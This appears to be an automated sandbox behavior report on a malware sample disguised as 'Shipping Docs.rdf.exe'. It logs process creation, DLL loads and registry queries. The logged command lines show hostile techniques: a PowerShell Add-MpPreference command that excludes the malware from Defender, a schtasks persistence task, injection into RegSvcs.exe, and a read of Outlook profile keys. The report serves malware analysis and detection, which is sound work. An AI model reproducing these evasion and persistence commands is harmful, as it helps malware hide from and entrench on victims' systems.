Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SVcPIbJno.exe C:\Users\user\AppData\Roaming\SVcPIbJno.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmp59D.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SVcPIbJno.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmpF63B.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmp59D.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: ucrtbase_clr0400.dll

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Shipping Docs.rdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Shipping Docs.rdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegSvcs.pdb, source: boqXv.exe, 00000018.00000000.1334932054.0000000000872000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr
